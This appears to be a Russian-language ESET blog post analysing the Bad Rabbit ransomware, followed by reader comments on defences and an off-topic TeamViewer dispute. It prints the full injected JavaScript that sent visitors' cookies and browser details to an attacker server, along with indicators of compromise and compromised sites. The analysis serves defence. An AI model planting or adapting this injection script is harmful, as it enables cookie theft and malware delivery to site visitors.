От атаки шифратора Diskcoder.D (Bad Rabbit), начавшейся 24 октября, пострадали компании России и Украины, включая Киевский метрополитен. Собрали в посте первые результаты исследования вредоносной программы.



Атака drive-by download с помощью watering hole на популярных сайтах


Один из способов распространения Bad Rabbit – атака drive-by download. Атакующие скомпрометировали несколько популярных сайтов, внедрив JavaScript в код HTML или один из файлов .js.



Ниже усовершенствованная версия инъекции:

function e(d) {
  var xhr = null;
  if (!!window.XMLHttpRequest) {
    xhr = new XMLHttpRequest();
  } else if (!!window.ActiveXObject) {
    var xhrs = ['Microsoft.XMLHTTP', 'Msxml2.XMLHTTP', 'Msxml2.XMLHTTP.3.0', 'Msxml2.XMLHTTP.6.0'];
    for (var i = 0; i < xhrs.length; i++) {
      try {
        xhr = ActiveXObject(xhrs[i]);
        break;
      } catch (e) {}
    }
  }
  if (!!xhr) {
    xhr.open('POST', 'http://185.149.120\.3/scholargoogle/');
    xhr.timeout = 10000;
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
      if (xhr.readyState == 4 && xhr.status == 200) {
        var resp = xhr.responseText;
        if (resp) {
          var fans = JSON.parse(resp);
          if (fans) {
            var an_s = decodeURIComponent(fans.InjectionString).replace(/\+/g, '%20');
            var da = document.createElement('div');
            da.id = 'ans';
            da.innerHTML = an_s;
            document.body.appendChild(da);
          }
        }
      }
    };
    var pd = [];
    for (var k in d) {
      if (d.hasOwnProperty(k)) {
        pd.push(k + '=' + d[k]);
      }
    }
    var dc = pd.join('&');
    xhr.send(dc);
  }
}
e({
  'agent': navigator.userAgent,
  'referer': document.referrer,
  'cookie': document.cookie,
  'domain': window.location.hostname,
  'c_state': !!document.cookie
});


Скрипт передает следующую информацию на 185.149.120[.]3, связь с которым, похоже, на данный момент отсутствует:

  • User-agent браузера
  • Referrer
  • Куки с посещенного сайта
  • Имя домена посещенного сайта

Логика на стороне сервера может определить, интересен ли посетитель, а затем добавить на страницу контент. В этом случае мы наблюдали всплывающее окно с предложением загрузить обновление для Flash Player.



По клику на кнопку Install запускается загрузка исполняемого файла с 1dnscontrol[.]com. Исполняемый файл install_flash_player.exe является дроппером Win32/Filecoder.D. Далее компьютер будет заблокирован, на экране появится сообщение о выкупе:



Страница с информацией об оплате:



Распространение через SMB


Win32/Diskcoder.D может распространяться через SMB. Вопреки некоторым сообщениям в СМИ, он НЕ ИСПОЛЬЗУЕТ эксплойт EthernalBlue (как это делал Win32/Diskcoder.C – он же Petya/NotPetya). В отличие от предшественника, Diskcoder.D сканирует внутреннюю сеть на предмет открытых сетевых дисков/ресурсов. Он ищет следующие сетевые шары:

admin
atsvc
browser
eventlog
lsarpc
netlogon
ntsvcs
spoolss
samr
srvsvc
scerpc
svcctl
wkssvc


На зараженной машине запускается Mimikatz для сбора учетных данных. Предусмотрен жестко закодированный список логинов и паролей.



После обнаружения действительных учетных данных файл infpub.dat будет загружен в каталог Windows и выполнен с помощью SCManager и rundll.exe.

Шифрование


Win32/Diskcoder.D – модифицированная версия Win32/Diskcoder.C, известного по прошлой эпидемии Petya/NotPetya. Исправлены ошибки в шифровании файлов. Для шифрования теперь используется DiskCryptor, легитимное ПО с открытым исходным кодом, предназначенное для шифрования логических дисков, внешних USB-накопителей и образов CD/DVD, а также загрузочных системных разделов диска. Ключи генерируются с использованием CryptGenRandom и затем будут защищены жестко закодированным открытым ключом RSA 2048.

Файлы зашифрованы с расширением .encrypted. Как и прежде, используется алгоритм AES-128-CBC.

Распространение


Интересно, что по данным телеметрии ESET на долю Украины приходится 12,2% обнаружений компонента дроппера. Статистика ниже:

  • Россия – 65%
  • Украина – 12,2%
  • Болгария – 10,2%
  • Турция – 6,4%
  • Япония – 3,8%
  • другие – 2,4%

Статистика в значительной степени соответствует географическому распределению скомпрометированных сайтов, содержащих вредоносный JavaScript. При этом Украина пострадала сильнее, чем остальные страны (кроме России).

Отметим, что крупные компании были поражены примерно в одно время. Возможно, у кибергруппы был доступ в их сети, и в то же время она начала атаку watering hole в качестве приманки. Не факт, что все жертвы попались на упомянутое обновление Flash Player. В любом случае, мы продолжаем расследование инцидента.

Образцы




C&C-серверы


Платежный сайт: http://caforssztxqzf2nm[.]onion
URL Inject: http://185.149.120[.]3/scholargoogle/
Distribution URL: hxxp://1dnscontrol[.]com/flash_install.php


Список скомпрометированных сайтов:


hxxp://argumentiru[.]com
hxxp://www.fontanka[.]ru
hxxp://grupovo[.]bg
hxxp://www.sinematurk[.]com
hxxp://www.aica.co[.]jp
hxxp://spbvoditel[.]ru
hxxp://argumenti[.]ru
hxxp://www.mediaport[.]ua
hxxp://blog.fontanka[.]ru
hxxp://an-crimea[.]ru
hxxp://www.t.ks[.]ua
hxxp://most-dnepr[.]info
hxxp://osvitaportal.com[.]ua
hxxp://www.otbrana[.]com
hxxp://calendar.fontanka[.]ru
hxxp://www.grupovo[.]bg
hxxp://www.pensionhotel[.]cz
hxxp://www.online812[.]ru
hxxp://www.imer[.]ro
hxxp://novayagazeta.spb[.]ru
hxxp://i24.com[.]ua
hxxp://bg.pensionhotel[.]com
hxxp://ankerch-crimea[.]ru

Комментарии (42)


  1. Pochemuk
    25.10.2017 00:51

    Если создать файл infpub.dat с атрибутом ReadOnly, это защитит машину?

    Поможет ли запрет в групповых политиках (Политика ограниченного использования программ) выполнения infpub.dat и install_flash_player.exe?


    1. AbnormalHead
      25.10.2017 02:16

      Здесь исследование от Касперского — securelist.com/bad-rabbit-ransomware/82851
      Они утверждают, что надо запретить выполнение файлов.

      The abovementioned measures should be sufficient. However, as additional precautions we advise the following:

      restricting execution of files with the paths c:\windows\infpub.dat and C:\Windows\cscc.dat in Kaspersky Endpoint Security.
      configuring and enabling Default Deny mode in the Application Startup Control component of Kaspersky Endpoint Security to ensure and enforce proactive defense against this and other attacks.


      1. Pochemuk
        25.10.2017 08:03

        Запретить выполнение файлов?

        — А потом вас там публично выпорют, как бродяг, и отправят в Сибирь убирать снег!
        — Весь?
        — Да! Снега там много.

        Так какие файлы нужно (и при этом возможно) запретить выполнять средствами ГП, чтобы при этом не запретить выполнять весь снег нужное?


        1. FreeManOfPeace
          25.10.2017 10:08

          Логично запретить выполнение всех исполняемых файлов из папки Загрузки. Если их всё таки надо будет запустить то их можно будет переместить в другую папку, но это будет уже осмысленное действие пользователя.
          Такая мера хорошо помогала мне в администрировании компов непродвинутых пользователей. Аналогично можно запретить запуск со всех дисков, кроме тех которые изначально присутствуют, это хорошо помогает от вирусов с флешек/сетевых шар.

          Работе такие меры как правило не мешают, просто надо проинструктировать пользователя, что если надо запустить программу и она не запускается скопируй в другую папку, но если ты скачал например музыку, и она не запускается то её вообще открывать не надо, а надо удалить.


    1. rub_ak
      25.10.2017 09:34

      SRP надо настраивать на белые списки, в противном случае толку от него мало. И самое главное у пользователей не должно быть прав админа, а у админов желательно отключить интернет.
      Если интересно как настроить SRP и убрать обходные пути SRP: www.sysadmins.lv/blog-ru/categoryview/securitysrp.aspx


      1. Serge78rus
        25.10.2017 10:07

        а у админов желательно отключить интернет.
        — это из серии «а кто будет сторожить сторожей?».
        Наверное, администратор сам должен соображать, что заниматься серфингом лучше с ограниченной в правах учетки.


        1. rub_ak
          25.10.2017 11:44

          У нас все админы сидят под пользователями, а для админских дел отдельные учетки.


  1. FeNUMe
    25.10.2017 03:56

    Интересно с чем связан такой «упор» на Украину в статье, если в этот раз самая пострадавшая страна РФ?


    1. SlavniyTeo
      25.10.2017 09:46

      Поддерживаю.


      Россия – 65%
      Украина – 12,2%
      Болгария – 10,2%
      Турция – 6,4%
      Япония – 3,8%
      другие – 2,4%

      Или почему не сказали про Болгарию? Разница с Украиной лишь 2%.


      1. Feodot
        25.10.2017 11:15

        Прошлого раза самая пострадавшая страна была Украина, потому и акцент


      1. KOCTALEM
        25.10.2017 11:15

        Возможно, это было сделано, чтобы подчеркнуть отличие от Petya.


      1. PbIXTOP
        26.10.2017 13:08

        Да и если это абсолютные цифры, то они ничего не показывают.
        Население Украины в 3 раза меньше России. Болгарии в 20. А есть еще соотношение установленного данного Антивируса у конечных пользователей.
        По моему мнению это должны быть проценты относительного срабатывания, которые и должны показывать степень угрозы для страны.


  1. mxm
    25.10.2017 05:32

    "Шо?! Опять?.."


    1. grishkaa
      25.10.2017 08:35

      Но на этот раз через самую непропатчиваемую дыру — безусловное доверие пользователей. Раньше было через уязвимость в службе SMB.


    1. physics
      25.10.2017 11:15

      Таки да! Мойша опять скучает!


  1. Newmo
    25.10.2017 10:08

    Интересно где можно взять этот install_flash_player.exe, что бы проверить, действительно ли это спасёт машины от дальнейшего заражения.


  1. nutshell912
    25.10.2017 11:15

    Небольшой оффтоп.
    В списке паролей: love, sex, secret, god. Создатель шифратора явно смотрел «Хакеры» 1995 года :)


    1. KOCTALEM
      25.10.2017 14:38

      Как подметил Касперский, Game of Thrones им тоже нравится :)


  1. ds6328
    25.10.2017 11:15

    Хорошо бы знать md5 и sha-256 образцов файлов, чтобы запретить запуск через касперского


  1. Kolapsec
    25.10.2017 11:15

    Ок… как можно защититься?
    Какие рекомендации?


    1. Newmo
      25.10.2017 11:23

      Пока, только создание в директории Windows двух файлов infpub.dat, cscc.dat, в свойствах «Только для чтения».


    1. sumanai
      25.10.2017 21:15

      Белые списки SRP или AppLocker. Защищает от прошлых, нынешних и будущих шифровальщиков общего назначения.


  1. Eldhenn
    25.10.2017 11:42

    Интересно, «не совсем настоящее» окно обновления флеш-плеера — это недоработка или сознательно оставленный шанс внимательным людям?


  1. vilgeforce
    25.10.2017 15:36

    «Файлы зашифрованы с расширением .encrypted» ну что ж вы пишите?.. Нет дополнительного расширения у зашифрованных файлов…


    1. voicekit
      25.10.2017 20:45


  1. sumanai
    25.10.2017 21:18

    Ниже усовершенствованная версия инъекции

    Это называется «не минифицированная», ну или «разминифицированная», чтобы подчеркнуть то, что изначальная версия скрипта минифицирована. Код в них абсолютно одинаков.


  1. untilx
    26.10.2017 13:07

    Учитывая методику распространения и способ шифрования, можно сказать, что на волне распространения шифровальщиков стало появляться всё больше подражателей, а сами троянцы становятся более тупыми и жадными.


  1. Graf54r
    26.10.2017 13:07

    Я не совсем понял, что нужно сделать чтобы заразится? Нужно зайти на сайт и скачать обновление для flash?


  1. Pochemuk
    26.10.2017 15:47

    По рекомендации ЛК отключил через ГП запуск WMI:
    www.kaspersky.ru/blog/bad-rabbit-ransomware/19072

    Но при этом системы стали ругаться, что отключена служба обеспечения безопасности. Т.е. получается, что лекарство может оказаться хуже болезни?
    Насколько критично отключение этой службы? К каким нехорошим последствиям это может привести?


    1. sumanai
      26.10.2017 15:55

      По моему, это самая бесполезная служба со времён Windows XP и до настоящих дней.
      Последствия? Предупреждение, которое никак не отключить, ну и мелочи типа того, что ОС перестаёт следить, в смысле за наличием антивируса и брандмаузера.
      А вот служба WMI, которую там предлагают отключить, может быть нужна софту, или же вам, если пользуетесь счётчиками производительности, которые иногда могут помочь выявить проблемы с ОС.


      1. Pochemuk
        26.10.2017 16:23

        Автоматический анализ счетчиков производительности, увы, пока не производится. Поэтому не жалко.

        Конечно, WMI нужна для удаленной инвентаризации (да и для локальной тоже). Но, в случае чего, ее и включить опять через ГП можно будет или локально.


      1. Pochemuk
        27.10.2017 10:20
        +1

        Все оказалось не столь радужно.

        После отключения WMI (а это потянуло за собой отключение по цепочке и других служб) отвалились сетевые ключи защиты 1С и WinSmeta, нарушилось подключение к расшаренным принтерам.

        Пришлось сегодня с утра бодренько вместо зарядки удалять это правило из ГП и включать потребные службы на серверах и рабочих компах.

        Плохой, плохой кроликс :(


  1. PontifexMaximus
    26.10.2017 16:13

    ESET, сорри за оффтоп — но тут интересуются, а почему ты не помечаешь Тимвьюер даже как потенциально опасное ПО? В то время как практически все остальные ремоут контролы, например Radmin — помечаешь.

    А то ведь вопрос все-таки связан с безопасностью пользователей. Получается, что один (избранный) ремоут контрол всегда и везде у тебя получает зеленый свет. Даже если он напичкан вирусами и троянами по самое нехочу.


    1. PontifexMaximus
      26.10.2017 16:38

      И это при том, что Radmin даже не умеет работать через zero-configuration, т.е. для соединения через интернет с Radmin всегда нужен проброс портов. В то время как для Тимвьюера достаточно ID.

      И однако же Radmin у тебя потенциальное опасное ПО, а Тимвьюер по неведомой нам причине — нет.


      1. esetnod32 Автор
        27.10.2017 16:44

        Оффтоп, да. Детектируем те сборки Team Viewer, которые были модифицированы злоумышленниками для вредоносных целей. Фактов использования оригинальной версии Team Viewer в таких целях отмечено не было.
        Детектирование Radmin в качестве потенциально опасного ПО корректно, так как данная программа зачастую некорректно используется злоумышленниками (в отличие от Team Viewer).


        1. PontifexMaximus
          27.10.2017 17:11

          Т.е. вы утверждаете, что оригинальный Тимвьюер не используется в широко известной схеме microsoft tech support scam, когда клиента по телефону обманом (под видом сотрудника MS) заставляют зайти на сайт Тимвьюера, скачать его, и сообщить ID и пароль? Самый обычный Тимвьюер, с сайта производителя. Не модифицированный.

          Вы серьезно это утверждаете? От имени компании? :)

          Если это не использование для вредоносных целей — то что тогда вообще использование для вредоносных целей? Неужели пользователь не имеет права знать, что на его компьютере запускается потенциально небезопасное ПО? Каким и является Тимвьюер по своей сути.


        1. PontifexMaximus
          27.10.2017 17:38

          Детектируем те сборки Team Viewer, которые были модифицированы злоумышленниками для вредоносных целей.


          Да что вы? А давайте проверим.

          Заходим в один очень известный варезник/борд и для целей проверки/тестирования качаем парочку пропатченных дистрибутивов Тимвьюер. Не буду приводить ссылки здесь — вы прекрасно знаете, о каком сайте речь.

          Итак — барабанная дробь — результат тестирования пропатченного экзешника Тимвьюер продуктом ESET. Но сначала версия базы сигнатур:

          imgur.com/zMl7LWW

          Вот детект с выключенным «Обнаружением потенциально опасного (и нежелательного) ПО»:

          imgur.com/DevmPmE

          А вот детект с включенным «Обнаружением..»:

          imgur.com/IkkWrh5

          Вопрос к залу — вам не кажется странным, что компания ESET уж как-то слишком трепетно относится к Тимвьюеру? А журналисты в курсе? А безопасники?


          1. PontifexMaximus
            27.10.2017 17:52

            Чуть поправлю — пропатченного дистрибутива, конечно (exe). Но это сути не меняет. А суть такая — какой-то левый неподписанный дистрибутив с Тивьюером внутри запускается на компе — и ESET ничего не предпринимает.

            Если бы это был дистрибутив какого-либо другого продукта, того же Radmin — пользователь бы устал закрывать сообщения об обнаруженных угрозах. Но с Тимвьюером как-то все оно, знаете ли, мутно у вас…


          1. PontifexMaximus
            27.10.2017 17:59

            Не знаю кого как, но меня, как пользователя ESET Internet Security 10, все это слегка напрягает.


          1. esetnod32 Автор
            27.10.2017 17:59

            Давайте с этой историей на мейл саппорта sdd@esetnod32.ru, если вам правда интересно.
            Тема к исходному посту отношения не имеет.


            1. PontifexMaximus
              27.10.2017 18:29

              Разве это только мне интересно? Тут скорее всего присутствует не один специалист по безопасности. Возможно даже и из ваших клиентов или госучреждений.

              Я более чем уверен, что и они хотят послушать ответы на вопросы выше. Ведь факты налицо — и их как-то надо объяснить. Безопасник не может просто взять и отбросить какие-то факты. Они его ночью будут преследовать :) Особенно если он отвечает за сеть корпорации, или упаси Боже — какой-нибудь федеральной службы.


            1. PontifexMaximus
              27.10.2017 19:02

              Понимаю, что вашему маркетингу и службе безопасности сейчас непросто. Но даю подсказку:

              1. Правильный ход действий: Отвечаете, что «О, ужас, конечно мы немедленно примем все меры и начнем детектировать пропатченные Тимвьюеры. Ведь это недопустимо, чтобы они попадали на компьютеры наших клиентов незамеченными. И да, конечно же, детект остальных легитимных ремоут контролов тоже несправедлив и нарушает антимонопольное законодательство. Поэтому, раз мы не детектим оригинальный Тимвьюер, мы не будем детектить и другие известные ремоут контролы. Ведь мы крупная и самостоятельная антивирусная компания, и в состоянии отличить легитимный продукт от пропатченного.»

              2. Неправильный ход действий. Упираться рогом и оправдываться даже при наличии вопиющих фактов выложенных публично. Nuff said.

              Уловили разницу? К сожалению, путь №2, судя по рынкам других стран, наиболее часто выбирается вашей компанией. Ну что ж, каждый сам выбирает свой путь.